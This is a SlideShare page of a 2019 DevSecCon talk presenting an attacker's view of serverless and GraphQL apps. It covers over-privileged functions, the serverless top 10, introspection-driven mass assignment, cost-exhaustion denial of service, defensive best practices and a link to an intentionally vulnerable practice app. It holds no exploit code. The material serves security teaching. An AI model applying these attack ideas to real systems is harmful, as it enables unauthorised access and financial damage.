SlideShare uma empresa Scribd logo

DevSecCon Singapore 2019: An attacker's view of Serverless and GraphQL apps Sharath Kumar Ramadas

DevSecCon
DevSecCon

Sharath Kumar Ramadas Serverless Technology (Functions as a Service) is fast becoming the next "big thing" in the world of distributed applications. Organizations are investing a great deal of resources in this technology as a force-multiplier, cost-saver and ops-simplification cure-all. Especially with widespread support from cloud vendors, this technology is going to only become more influential. However, like everything else, Serverless apps are subject to a wide variety of attack possibilities, ranging from attacks against access control tech like JWTs, to NoSQL Injection, to exploits against the apps themselves (deserialization, etc) escalating privileges to other cloud components. On the other hand GraphQL (API Query Language) is the natural companion to serverless apps, where traditional REST APIs are replaced with GraphQL to provide greater flexibility, greater query parameterization and speed. GraphQL is slowly negating the need for REST APIs from being developed. Combined with Serverless tech/Reactive Front-end frameworks, GraphQL is very powerful for distributed apps. However, GraphQL can be abused with a variety of attacks including but not limited to Injection Attacks, Nested Resource Exhaustion attacks, Authorization Flaws among others. This talk presents a red-team perspective of the various ways in which testers can discover and exploit serverless and/or GraphQL driven applications to compromise sensitive information, and gain a deeper foothold into database services, IAM services and other other cloud components. The talk will have some demos that will demonstrate practical attacks and attack possibilities against Serverless and GraphQL applications. The author will release an intentionally vulnerable Serverless and GraphQL app at the end of the talk for the benefit of the audience and the security community at large.

Tecnologia
1 de 39
Baixar para ler offline
Singapore | 28 Feb - 01 Mar 2019 An Attacker's View of Serverless and GraphQL Apps Sharath Kumar Ramadas
Singapore | 28 Feb - 01 Mar 2019 About Me • Lead Solutions Engineer • we45 - An AppSec Company • Trainer - DevSecOps, Containers & Serverless • Developer - DVFAAS, Orchestron & ThreatPlayBook • Developer → DevOps → DevSecOps @sharathkramadas @sharathkramadas
Singapore | 28 Feb - 01 Mar 2019 Agenda • Intro to Serverless • Serverless Attacks • Intro to GraphQL • GraphQL Attacks • Demos
Singapore | 28 Feb - 01 Mar 2019 SERVERLESS
Singapore | 28 Feb - 01 Mar 2019 Serverless • Functions deployed as ephemeral containers/vms • Functions As A Service (FAAS) • Event trigger architecture • Supports major runtimes • Python, NodeJS, C#, GO, Ruby • Custom runtime also
Singapore | 28 Feb - 01 Mar 2019 Serverless Journey
Singapore | 28 Feb - 01 Mar 2019 Functions
Singapore | 28 Feb - 01 Mar 2019 Why Serverless? • Pay per usage • No server management • Microservices Friendly • Auto-Scalable • Focus on code/features, don’t worry about servers
Singapore | 28 Feb - 01 Mar 2019 FAAS Providers
Singapore | 28 Feb - 01 Mar 2019 Architecture
Singapore | 28 Feb - 01 Mar 2019 Serverless Use-Cases • ChatBots • Event driven apps • Notification Channels (SMS, Email) • Scheduled Jobs • Product websites • Lot more …..
Singapore | 28 Feb - 01 Mar 2019 Let’s Deploy!
Singapore | 28 Feb - 01 Mar 2019 Functions with Events
Singapore | 28 Feb - 01 Mar 2019 An Attacker’s View • Functions are still code • No frameworks involved • Functions as events increases attack surface • Developers are new to servers • Still needs configuration
Singapore | 28 Feb - 01 Mar 2019 Attackers are Snipers! • Aimed • Committed • Patient • Invisible • Takes clear Shot
Singapore | 28 Feb - 01 Mar 2019 Claim your expenses
Singapore | 28 Feb - 01 Mar 2019 Extensive Privileged Functions • Functions with extensive privileges lead to infrastructure compromise • Cloud providers store secrets in plain text • Misconfigured roles can lead to wide spectrum of attacks • Events are most vulnerable due to lack of Authentication and Authorization • Pay per usage model turns out to be expensive.
Singapore | 28 Feb - 01 Mar 2019 Accenture S3 Breach
Singapore | 28 Feb - 01 Mar 2019 Fedex Breach
Singapore | 28 Feb - 01 Mar 2019 Serverless Top 10 • Event data injection • Broken Authentication • Insecure deployment configuration • Over privileged function permissions & roles • Inadequate function monitoring and logging • Insecure 3rd party dependencies • Insecure application secrets storage • DOS and Financial resource exhaustion • Function Execution Flow Manipulation • Improper Exception Handling and Verbose Error Messages
Singapore | 28 Feb - 01 Mar 2019 Serverless (Security) Best Practices • Functions with minimal access credentials • Remove insecure dependencies before production • Run SAST scans before code commit • Restrict memory usage for a function • Encrypt the secrets avoid environment variables • Use FAAS providers authorization for access control (ex: AWS Cognito) • Write security test cases and run in CI/CD @sharathkramadas
Singapore | 28 Feb - 01 Mar 2019 GraphQL
Singapore | 28 Feb - 01 Mar 2019 GraphQL • A query language for API • Tech from Facebook • Query what you want forget about the ‘REST’ • Single endpoint for API calls • Lightweight
Singapore | 28 Feb - 01 Mar 2019 REST GraphQL VS
Singapore | 28 Feb - 01 Mar 2019 Terminology • Type • Schema • Query • Mutation • Subscription • Introspection • Schema Stitching
Singapore | 28 Feb - 01 Mar 2019 Let’s Demo
Singapore | 28 Feb - 01 Mar 2019 An Attacker’s View • No response size limiting • Introspection is nice! • Single endpoint access control
Singapore | 28 Feb - 01 Mar 2019 Demo Want to get more powers!
Singapore | 28 Feb - 01 Mar 2019 Mass Assignment • Frameworks allow to save the raw dump of HTTP request data • Attackers can guess the sensitive fields • Sensitive fields can allow to escalate privileges • GraphQL has introspection enabled by default • Introspection leaks the sensitive fields information • GraphQL supports JSON Scalar
Singapore | 28 Feb - 01 Mar 2019 GitHub Attack
Singapore | 28 Feb - 01 Mar 2019 Let’s burn few dollars
Singapore | 28 Feb - 01 Mar 2019 Serverless Cost
Singapore | 28 Feb - 01 Mar 2019 Resource Exhaustion • aka Denial-Of-Service attack • Overwhelmed requests to crash the server • Causes memory leak and resource exhaust • Serverless + GraphQL = (pay per usage + scale) • 2 million requests * 3 dollar per query = (I will live it to your imagination!)
Singapore | 28 Feb - 01 Mar 2019 Recent Attack
Singapore | 28 Feb - 01 Mar 2019 GraphQL (Security) Best Practices • Disable introspection • Disable playground in production • Limit the query size • Depth limiting for nested queries • Avoid scalars use input types
Singapore | 28 Feb - 01 Mar 2019 Hack It Yourself! https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service
Singapore | 28 Feb - 01 Mar 2019 Things to consider • OWASP Top 10 • Serverless Top 10 • SAST and SCA tools • Threat-Modeling
Singapore | 28 Feb - 01 Mar 2019 Key Takeaways • Serverless security is still an application security problem • Roles and Permissions should be well thought of • Secure coding practices need to be followed • Resource limitations is highly recommended
Singapore | 28 Feb - 01 Mar 2019 Thank You @sharathkramadas @sharathkramadas

Recomendados

DevSecCon Singapore 2019: crypto jacking: An evolving threat for cloud contai...
DevSecCon Singapore 2019: crypto jacking: An evolving threat for cloud contai...DevSecCon Singapore 2019: crypto jacking: An evolving threat for cloud contai...
DevSecCon Singapore 2019: crypto jacking: An evolving threat for cloud contai...DevSecCon
 
DevSecCon Singapore 2019: Web Services aren’t as secure as we think
DevSecCon Singapore 2019: Web Services aren’t as secure as we thinkDevSecCon Singapore 2019: Web Services aren’t as secure as we think
DevSecCon Singapore 2019: Web Services aren’t as secure as we thinkDevSecCon
 
DevSecCon Singapore 2019: Can "dev", "sec" and "ops" really coexist in the wi...
DevSecCon Singapore 2019: Can "dev", "sec" and "ops" really coexist in the wi...DevSecCon Singapore 2019: Can "dev", "sec" and "ops" really coexist in the wi...
DevSecCon Singapore 2019: Can "dev", "sec" and "ops" really coexist in the wi...DevSecCon
 
DevSecCon Seattle 2019: Containerizing IT Security Knowledge
DevSecCon Seattle 2019: Containerizing IT Security KnowledgeDevSecCon Seattle 2019: Containerizing IT Security Knowledge
DevSecCon Seattle 2019: Containerizing IT Security KnowledgeDevSecCon
 
DevSecCon Seattle 2019: Fully Automated production deployments with HIPAA/HIT...
DevSecCon Seattle 2019: Fully Automated production deployments with HIPAA/HIT...DevSecCon Seattle 2019: Fully Automated production deployments with HIPAA/HIT...
DevSecCon Seattle 2019: Fully Automated production deployments with HIPAA/HIT...DevSecCon
 
App & API Monitoring: Building a 5-Star Reputation for your Apps
App & API Monitoring: Building a 5-Star Reputation for your AppsApp & API Monitoring: Building a 5-Star Reputation for your Apps
App & API Monitoring: Building a 5-Star Reputation for your AppsApigee | Google Cloud
 
Zetta js Hands on IoT
Zetta js Hands on IoT Zetta js Hands on IoT
Zetta js Hands on IoT Anil Sagar
 
What are your APIs Worth?
What are your APIs Worth?What are your APIs Worth?
What are your APIs Worth?Apigee | Google Cloud
 

Recomendados

DevSecCon Singapore 2019: crypto jacking: An evolving threat for cloud contai...
DevSecCon Singapore 2019: crypto jacking: An evolving threat for cloud contai...DevSecCon Singapore 2019: crypto jacking: An evolving threat for cloud contai...
DevSecCon Singapore 2019: crypto jacking: An evolving threat for cloud contai...DevSecCon
 
DevSecCon Singapore 2019: Web Services aren’t as secure as we think
DevSecCon Singapore 2019: Web Services aren’t as secure as we thinkDevSecCon Singapore 2019: Web Services aren’t as secure as we think
DevSecCon Singapore 2019: Web Services aren’t as secure as we thinkDevSecCon
 
DevSecCon Singapore 2019: Can "dev", "sec" and "ops" really coexist in the wi...
DevSecCon Singapore 2019: Can "dev", "sec" and "ops" really coexist in the wi...DevSecCon Singapore 2019: Can "dev", "sec" and "ops" really coexist in the wi...
DevSecCon Singapore 2019: Can "dev", "sec" and "ops" really coexist in the wi...DevSecCon
 
DevSecCon Seattle 2019: Containerizing IT Security Knowledge
DevSecCon Seattle 2019: Containerizing IT Security KnowledgeDevSecCon Seattle 2019: Containerizing IT Security Knowledge
DevSecCon Seattle 2019: Containerizing IT Security KnowledgeDevSecCon
 
DevSecCon Seattle 2019: Fully Automated production deployments with HIPAA/HIT...
DevSecCon Seattle 2019: Fully Automated production deployments with HIPAA/HIT...DevSecCon Seattle 2019: Fully Automated production deployments with HIPAA/HIT...
DevSecCon Seattle 2019: Fully Automated production deployments with HIPAA/HIT...DevSecCon
 
App & API Monitoring: Building a 5-Star Reputation for your Apps
App & API Monitoring: Building a 5-Star Reputation for your AppsApp & API Monitoring: Building a 5-Star Reputation for your Apps
App & API Monitoring: Building a 5-Star Reputation for your AppsApigee | Google Cloud
 
Zetta js Hands on IoT
Zetta js Hands on IoT Zetta js Hands on IoT
Zetta js Hands on IoT Anil Sagar
 
What are your APIs Worth?
What are your APIs Worth?What are your APIs Worth?
What are your APIs Worth?Apigee | Google Cloud
 
I Love APIs 2015: Apigee and Node.js Building Mock Backends Fast
I Love APIs 2015: Apigee and Node.js Building Mock Backends FastI Love APIs 2015: Apigee and Node.js Building Mock Backends Fast
I Love APIs 2015: Apigee and Node.js Building Mock Backends FastApigee | Google Cloud
 
Data Driven Security
Data Driven SecurityData Driven Security
Data Driven SecurityApigee | Google Cloud
 
apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...
apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...
apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...apidays
 
DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...
DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...
DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...DevSecCon
 
Building Resilient Microservices
Building Resilient Microservices Building Resilient Microservices
Building Resilient Microservices IndicThreads
 
Serverless integration - Logic Apps the most comprehensive integration service
Serverless integration - Logic Apps the most comprehensive integration serviceServerless integration - Logic Apps the most comprehensive integration service
Serverless integration - Logic Apps the most comprehensive integration serviceBizTalk360
 
API Design Workflows
API Design WorkflowsAPI Design Workflows
API Design WorkflowsJakub Nesetril
 
Will ServerLess kill containers and Operations
Will ServerLess kill containers and OperationsWill ServerLess kill containers and Operations
Will ServerLess kill containers and OperationsStephane Woillez
 
Webcast: Apigee Edge Product Demo
Webcast: Apigee Edge Product DemoWebcast: Apigee Edge Product Demo
Webcast: Apigee Edge Product DemoApigee | Google Cloud
 
DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...
DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...
DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...DevSecCon
 
IoTCraft - Chennai - meetup - ZettaJS - IoT Intro
IoTCraft - Chennai - meetup - ZettaJS - IoT IntroIoTCraft - Chennai - meetup - ZettaJS - IoT Intro
IoTCraft - Chennai - meetup - ZettaJS - IoT IntroAnil Sagar
 
apidays LIVE Paris - Principles for API security by Alan Glickenhouse
apidays LIVE Paris - Principles for API security by Alan Glickenhouseapidays LIVE Paris - Principles for API security by Alan Glickenhouse
apidays LIVE Paris - Principles for API security by Alan Glickenhouseapidays
 
Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...
Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...
Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...Daniel Zivkovic
 
Zetta: An API First Platform
Zetta: An API First PlatformZetta: An API First Platform
Zetta: An API First PlatformAPI Meetup
 
APIs: The New Security Layer
APIs: The New Security LayerAPIs: The New Security Layer
APIs: The New Security LayerApigee | Google Cloud
 
Move Fast;Stay Safe:Developing & Deploying the Netflix API
Move Fast;Stay Safe:Developing & Deploying the Netflix APIMove Fast;Stay Safe:Developing & Deploying the Netflix API
Move Fast;Stay Safe:Developing & Deploying the Netflix APISangeeta Narayanan
 
Edge API BaaS Deep-Dive: Streamline app development
Edge API BaaS Deep-Dive: Streamline app developmentEdge API BaaS Deep-Dive: Streamline app development
Edge API BaaS Deep-Dive: Streamline app developmentApigee | Google Cloud
 
Developer Services: Making Developers Successful
Developer Services: Making Developers SuccessfulDeveloper Services: Making Developers Successful
Developer Services: Making Developers SuccessfulApigee | Google Cloud
 
Adapt or Die DevJam: San Francisco, Sept 27 2016
Adapt or Die DevJam: San Francisco, Sept 27 2016Adapt or Die DevJam: San Francisco, Sept 27 2016
Adapt or Die DevJam: San Francisco, Sept 27 2016Apigee | Google Cloud
 
Deep Dive: Strategic Importance of BaaS
Deep Dive: Strategic Importance of BaaSDeep Dive: Strategic Importance of BaaS
Deep Dive: Strategic Importance of BaaSApigee | Google Cloud
 
DevSecCon singapore 2019 Kunal Relan
DevSecCon singapore 2019 Kunal RelanDevSecCon singapore 2019 Kunal Relan
DevSecCon singapore 2019 Kunal RelanKunal Relan
 
Pros & Cons of Microservices Architecture
Pros & Cons of Microservices ArchitecturePros & Cons of Microservices Architecture
Pros & Cons of Microservices ArchitectureAshwini Kuntamukkala
 

Mais conteúdo relacionado

Mais procurados

I Love APIs 2015: Apigee and Node.js Building Mock Backends Fast
I Love APIs 2015: Apigee and Node.js Building Mock Backends FastI Love APIs 2015: Apigee and Node.js Building Mock Backends Fast
I Love APIs 2015: Apigee and Node.js Building Mock Backends FastApigee | Google Cloud
 
apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...
apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...
apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...apidays
 
DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...
DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...
DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...DevSecCon
 
Building Resilient Microservices
Building Resilient Microservices Building Resilient Microservices
Building Resilient Microservices IndicThreads
 
Serverless integration - Logic Apps the most comprehensive integration service
Serverless integration - Logic Apps the most comprehensive integration serviceServerless integration - Logic Apps the most comprehensive integration service
Serverless integration - Logic Apps the most comprehensive integration serviceBizTalk360
 
Will ServerLess kill containers and Operations
Will ServerLess kill containers and OperationsWill ServerLess kill containers and Operations
Will ServerLess kill containers and OperationsStephane Woillez
 
DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...
DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...
DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...DevSecCon
 
IoTCraft - Chennai - meetup - ZettaJS - IoT Intro
IoTCraft - Chennai - meetup - ZettaJS - IoT IntroIoTCraft - Chennai - meetup - ZettaJS - IoT Intro
IoTCraft - Chennai - meetup - ZettaJS - IoT IntroAnil Sagar
 
apidays LIVE Paris - Principles for API security by Alan Glickenhouse
apidays LIVE Paris - Principles for API security by Alan Glickenhouseapidays LIVE Paris - Principles for API security by Alan Glickenhouse
apidays LIVE Paris - Principles for API security by Alan Glickenhouseapidays
 
Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...
Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...
Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...Daniel Zivkovic
 
Zetta: An API First Platform
Zetta: An API First PlatformZetta: An API First Platform
Zetta: An API First PlatformAPI Meetup
 
Move Fast;Stay Safe:Developing & Deploying the Netflix API
Move Fast;Stay Safe:Developing & Deploying the Netflix APIMove Fast;Stay Safe:Developing & Deploying the Netflix API
Move Fast;Stay Safe:Developing & Deploying the Netflix APISangeeta Narayanan
 
Edge API BaaS Deep-Dive: Streamline app development
Edge API BaaS Deep-Dive: Streamline app developmentEdge API BaaS Deep-Dive: Streamline app development
Edge API BaaS Deep-Dive: Streamline app developmentApigee | Google Cloud
 
Developer Services: Making Developers Successful
Developer Services: Making Developers SuccessfulDeveloper Services: Making Developers Successful
Developer Services: Making Developers SuccessfulApigee | Google Cloud
 
Adapt or Die DevJam: San Francisco, Sept 27 2016
Adapt or Die DevJam: San Francisco, Sept 27 2016Adapt or Die DevJam: San Francisco, Sept 27 2016
Adapt or Die DevJam: San Francisco, Sept 27 2016Apigee | Google Cloud
 
Deep Dive: Strategic Importance of BaaS
Deep Dive: Strategic Importance of BaaSDeep Dive: Strategic Importance of BaaS
Deep Dive: Strategic Importance of BaaSApigee | Google Cloud
 

Mais procurados (20)

I Love APIs 2015: Apigee and Node.js Building Mock Backends Fast
I Love APIs 2015: Apigee and Node.js Building Mock Backends FastI Love APIs 2015: Apigee and Node.js Building Mock Backends Fast
I Love APIs 2015: Apigee and Node.js Building Mock Backends Fast
 
Data Driven Security
Data Driven SecurityData Driven Security
Data Driven Security
 
apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...
apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...
apidays LIVE India - 10 steps to secure your API by Pabitra Kumar Sahoo, Qual...
 
DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...
DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...
DevSecCon Seattle 2019: Decentralized Authorization - Implementing Fine Grain...
 
Building Resilient Microservices
Building Resilient Microservices Building Resilient Microservices
Building Resilient Microservices
 
Serverless integration - Logic Apps the most comprehensive integration service
Serverless integration - Logic Apps the most comprehensive integration serviceServerless integration - Logic Apps the most comprehensive integration service
Serverless integration - Logic Apps the most comprehensive integration service
 
API Design Workflows
API Design WorkflowsAPI Design Workflows
API Design Workflows
 
Will ServerLess kill containers and Operations
Will ServerLess kill containers and OperationsWill ServerLess kill containers and Operations
Will ServerLess kill containers and Operations
 
Webcast: Apigee Edge Product Demo
Webcast: Apigee Edge Product DemoWebcast: Apigee Edge Product Demo
Webcast: Apigee Edge Product Demo
 
DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...
DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...
DevSecCon Seattle 2019: Liquid Software as the real solution for the Sec in D...
 
IoTCraft - Chennai - meetup - ZettaJS - IoT Intro
IoTCraft - Chennai - meetup - ZettaJS - IoT IntroIoTCraft - Chennai - meetup - ZettaJS - IoT Intro
IoTCraft - Chennai - meetup - ZettaJS - IoT Intro
 
apidays LIVE Paris - Principles for API security by Alan Glickenhouse
apidays LIVE Paris - Principles for API security by Alan Glickenhouseapidays LIVE Paris - Principles for API security by Alan Glickenhouse
apidays LIVE Paris - Principles for API security by Alan Glickenhouse
 
Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...
Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...
Doing more with Static Sites + Transcription and Sentiment Analysis Pipeline ...
 
Zetta: An API First Platform
Zetta: An API First PlatformZetta: An API First Platform
Zetta: An API First Platform
 
APIs: The New Security Layer
APIs: The New Security LayerAPIs: The New Security Layer
APIs: The New Security Layer
 
Move Fast;Stay Safe:Developing & Deploying the Netflix API
Move Fast;Stay Safe:Developing & Deploying the Netflix APIMove Fast;Stay Safe:Developing & Deploying the Netflix API
Move Fast;Stay Safe:Developing & Deploying the Netflix API
 
Edge API BaaS Deep-Dive: Streamline app development
Edge API BaaS Deep-Dive: Streamline app developmentEdge API BaaS Deep-Dive: Streamline app development
Edge API BaaS Deep-Dive: Streamline app development
 
Developer Services: Making Developers Successful
Developer Services: Making Developers SuccessfulDeveloper Services: Making Developers Successful
Developer Services: Making Developers Successful
 
Adapt or Die DevJam: San Francisco, Sept 27 2016
Adapt or Die DevJam: San Francisco, Sept 27 2016Adapt or Die DevJam: San Francisco, Sept 27 2016
Adapt or Die DevJam: San Francisco, Sept 27 2016
 
Deep Dive: Strategic Importance of BaaS
Deep Dive: Strategic Importance of BaaSDeep Dive: Strategic Importance of BaaS
Deep Dive: Strategic Importance of BaaS
 

Semelhante a DevSecCon Singapore 2019: An attacker's view of Serverless and GraphQL apps Sharath Kumar Ramadas

DevSecCon singapore 2019 Kunal Relan
DevSecCon singapore 2019 Kunal RelanDevSecCon singapore 2019 Kunal Relan
DevSecCon singapore 2019 Kunal RelanKunal Relan
 
Pros & Cons of Microservices Architecture
Pros & Cons of Microservices ArchitecturePros & Cons of Microservices Architecture
Pros & Cons of Microservices ArchitectureAshwini Kuntamukkala
 
Tokyo Azure Meetup #5 - Microservices and Azure Service Fabric
Tokyo Azure Meetup #5 - Microservices and Azure Service FabricTokyo Azure Meetup #5 - Microservices and Azure Service Fabric
Tokyo Azure Meetup #5 - Microservices and Azure Service FabricTokyo Azure Meetup
 
Cloud Conputing Basics and some Related Research Topics
Cloud Conputing Basics and some Related Research TopicsCloud Conputing Basics and some Related Research Topics
Cloud Conputing Basics and some Related Research TopicsTharindu Weerasinghe
 
What serverless means for enterprise apps
What serverless means for enterprise appsWhat serverless means for enterprise apps
What serverless means for enterprise appsSumit Sarkar
 
(SACON) Anant Shrivastava - cloud pentesting
(SACON) Anant Shrivastava - cloud pentesting(SACON) Anant Shrivastava - cloud pentesting
(SACON) Anant Shrivastava - cloud pentestingPriyanka Aash
 
NUS-ISS Learning Day 2018- Designing software to make the most of cloud platf...
NUS-ISS Learning Day 2018- Designing software to make the most of cloud platf...NUS-ISS Learning Day 2018- Designing software to make the most of cloud platf...
NUS-ISS Learning Day 2018- Designing software to make the most of cloud platf...NUS-ISS
 
Azuresatpn19 - An Introduction To Azure Data Factory
Azuresatpn19 - An Introduction To Azure Data FactoryAzuresatpn19 - An Introduction To Azure Data Factory
Azuresatpn19 - An Introduction To Azure Data FactoryRiccardo Perico
 
Hybrid Integration with BizTalk Server - ACSUG
Hybrid Integration with BizTalk Server - ACSUGHybrid Integration with BizTalk Server - ACSUG
Hybrid Integration with BizTalk Server - ACSUGWagner Silveira
 
Serverless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesServerless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesUnderscore VC
 
Serverless in the Azure World
Serverless in the Azure WorldServerless in the Azure World
Serverless in the Azure WorldKasun Kodagoda
 
ServiceFabric-Arch
ServiceFabric-ArchServiceFabric-Arch
ServiceFabric-ArchSaravanan G
 
The Future of Serverless
The Future of ServerlessThe Future of Serverless
The Future of ServerlessWSO2
 
Anatomy of an Enterprise Integration Architecture
Anatomy of an Enterprise Integration ArchitectureAnatomy of an Enterprise Integration Architecture
Anatomy of an Enterprise Integration ArchitectureDaniel Toomey
 
ArchitectNow - Designing Cloud-Native apps in Microsoft Azure
ArchitectNow - Designing Cloud-Native apps in Microsoft AzureArchitectNow - Designing Cloud-Native apps in Microsoft Azure
ArchitectNow - Designing Cloud-Native apps in Microsoft AzureKevin Grossnicklaus
 
2 speed it powered by microsoft azure
2 speed it powered by microsoft azure2 speed it powered by microsoft azure
2 speed it powered by microsoft azureMichael Stephenson
 
Comparing Legacy and Modern e-commerce solutions
Comparing Legacy and Modern e-commerce solutionsComparing Legacy and Modern e-commerce solutions
Comparing Legacy and Modern e-commerce solutionsMike Ensor
 

Semelhante a DevSecCon Singapore 2019: An attacker's view of Serverless and GraphQL apps Sharath Kumar Ramadas (20)

DevSecCon singapore 2019 Kunal Relan
DevSecCon singapore 2019 Kunal RelanDevSecCon singapore 2019 Kunal Relan
DevSecCon singapore 2019 Kunal Relan
 
Pros & Cons of Microservices Architecture
Pros & Cons of Microservices ArchitecturePros & Cons of Microservices Architecture
Pros & Cons of Microservices Architecture
 
Tokyo Azure Meetup #5 - Microservices and Azure Service Fabric
Tokyo Azure Meetup #5 - Microservices and Azure Service FabricTokyo Azure Meetup #5 - Microservices and Azure Service Fabric
Tokyo Azure Meetup #5 - Microservices and Azure Service Fabric
 
Cloud Conputing Basics and some Related Research Topics
Cloud Conputing Basics and some Related Research TopicsCloud Conputing Basics and some Related Research Topics
Cloud Conputing Basics and some Related Research Topics
 
What serverless means for enterprise apps
What serverless means for enterprise appsWhat serverless means for enterprise apps
What serverless means for enterprise apps
 
(SACON) Anant Shrivastava - cloud pentesting
(SACON) Anant Shrivastava - cloud pentesting(SACON) Anant Shrivastava - cloud pentesting
(SACON) Anant Shrivastava - cloud pentesting
 
NUS-ISS Learning Day 2018- Designing software to make the most of cloud platf...
NUS-ISS Learning Day 2018- Designing software to make the most of cloud platf...NUS-ISS Learning Day 2018- Designing software to make the most of cloud platf...
NUS-ISS Learning Day 2018- Designing software to make the most of cloud platf...
 
Azuresatpn19 - An Introduction To Azure Data Factory
Azuresatpn19 - An Introduction To Azure Data FactoryAzuresatpn19 - An Introduction To Azure Data Factory
Azuresatpn19 - An Introduction To Azure Data Factory
 
Hybrid Integration with BizTalk Server - ACSUG
Hybrid Integration with BizTalk Server - ACSUGHybrid Integration with BizTalk Server - ACSUG
Hybrid Integration with BizTalk Server - ACSUG
 
Serverless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesServerless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment Opportunities
 
Serverless in the Azure World
Serverless in the Azure WorldServerless in the Azure World
Serverless in the Azure World
 
ServiceFabric-Arch
ServiceFabric-ArchServiceFabric-Arch
ServiceFabric-Arch
 
Serverless
ServerlessServerless
Serverless
 
The Future of Serverless
The Future of ServerlessThe Future of Serverless
The Future of Serverless
 
Anatomy of an Enterprise Integration Architecture
Anatomy of an Enterprise Integration ArchitectureAnatomy of an Enterprise Integration Architecture
Anatomy of an Enterprise Integration Architecture
 
ArchitectNow - Designing Cloud-Native apps in Microsoft Azure
ArchitectNow - Designing Cloud-Native apps in Microsoft AzureArchitectNow - Designing Cloud-Native apps in Microsoft Azure
ArchitectNow - Designing Cloud-Native apps in Microsoft Azure
 
2 speed it powered by microsoft azure
2 speed it powered by microsoft azure2 speed it powered by microsoft azure
2 speed it powered by microsoft azure
 
Super charged prototyping
Super charged prototypingSuper charged prototyping
Super charged prototyping
 
Azure functions serverless
Azure functions serverlessAzure functions serverless
Azure functions serverless
 
Comparing Legacy and Modern e-commerce solutions
Comparing Legacy and Modern e-commerce solutionsComparing Legacy and Modern e-commerce solutions
Comparing Legacy and Modern e-commerce solutions
 

Mais de DevSecCon

DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...DevSecCon
 
DevSecCon London 2019: Are Open Source Developers Security’s New Front Line?
DevSecCon London 2019: Are Open Source Developers Security’s New Front Line?DevSecCon London 2019: Are Open Source Developers Security’s New Front Line?
DevSecCon London 2019: Are Open Source Developers Security’s New Front Line?DevSecCon
 
DevSecCon London 2019: How to Secure OpenShift Environments and What Happens ...
DevSecCon London 2019: How to Secure OpenShift Environments and What Happens ...DevSecCon London 2019: How to Secure OpenShift Environments and What Happens ...
DevSecCon London 2019: How to Secure OpenShift Environments and What Happens ...DevSecCon
 
DevSecCon London 2019: A Kernel of Truth: Intrusion Detection and Attestation...
DevSecCon London 2019: A Kernel of Truth: Intrusion Detection and Attestation...DevSecCon London 2019: A Kernel of Truth: Intrusion Detection and Attestation...
DevSecCon London 2019: A Kernel of Truth: Intrusion Detection and Attestation...DevSecCon
 
DevSecCon Singapore 2019: Four years of reflection: How (not) to secure Web A...
DevSecCon Singapore 2019: Four years of reflection: How (not) to secure Web A...DevSecCon Singapore 2019: Four years of reflection: How (not) to secure Web A...
DevSecCon Singapore 2019: Four years of reflection: How (not) to secure Web A...DevSecCon
 
DevSecCon Singapore 2019: Workshop - Burp extension writing workshop
DevSecCon Singapore 2019: Workshop - Burp extension writing workshopDevSecCon Singapore 2019: Workshop - Burp extension writing workshop
DevSecCon Singapore 2019: Workshop - Burp extension writing workshopDevSecCon
 
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
